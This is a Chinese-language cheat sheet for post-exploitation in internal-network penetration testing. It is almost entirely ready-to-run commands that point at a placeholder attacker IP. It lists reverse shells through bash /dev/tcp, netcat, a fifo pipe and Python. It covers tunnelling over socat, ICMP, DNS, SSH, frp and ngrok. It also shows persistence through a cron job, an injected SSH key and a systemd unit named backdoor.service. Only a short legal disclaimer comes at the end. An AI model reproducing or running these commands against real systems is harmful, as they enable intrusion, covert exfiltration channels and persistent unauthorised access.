# 目标机器执行
bash -i >& /dev/tcp/攻击机IP/端口 0>&1
# 攻击机监听
nc -lvp 端口
# 目标机器执行
nc -e /bin/sh 攻击机IP 端口
# 或当没有-e参数时
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 攻击机IP 端口 >/tmp/f
# 攻击机监听
nc -lvp 端口
# 目标机器执行
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机IP",端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# 使用已开放的SSH端口进行反弹
socat TCP4:攻击机IP:端口,reuseaddr,fork TCP4:127.0.0.1:22
# 使用ptunnel建立ICMP隧道
ptunnel -p 攻击机IP -lp 本地端口 -da 目标IP -dp 目标端口
# 使用dnscat2
# 攻击机
dnscat2-server --dns domain=example.com
# 目标机器
dnscat2 --dns server=攻击机IP,domain=example.com
# 目标机器执行
ssh -fN -R 攻击机端口:localhost:目标端口 攻击机用户@攻击机IP
# 攻击机连接本地端口即可访问目标服务
ssh localhost -p 攻击机端口
# frps.ini (攻击机)
[common]
bind_port = 7000
# frpc.ini (目标机器)
[common]
server_addr = 攻击机IP
server_port = 7000
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000
# 攻击机运行ngrok服务端
./ngrokd -tlsKey=server.key -tlsCrt=server.crt -domain="example.com" -httpAddr=":8080" -httpsAddr=":8081"
# 目标机器运行客户端
./ngrok -config=ngrok.cfg -subdomain=test 80
# 写入定时任务
(crontab -l;echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/攻击机IP/端口 0>&1'")|crontab -
# 攻击机生成密钥
ssh-keygen -t rsa
# 目标机器写入公钥
echo "公钥内容" >> ~/.ssh/authorized_keys
# /etc/systemd/system/backdoor.service
[Unit]
Description=Backdoor Service
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/攻击机IP/端口 0>&1'
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
权限维持:反弹成功后,应考虑多种权限维持方法,如添加用户、SSH密钥、后门服务等
流量隐蔽:
环境适应:
防御措施:
法律风险:所有技术应仅用于合法授权的渗透测试和安全研究,未经授权使用可能涉及法律问题
内网渗透是一个复杂的过程,需要根据实际情况灵活调整策略,同时要注重隐蔽性和持久性。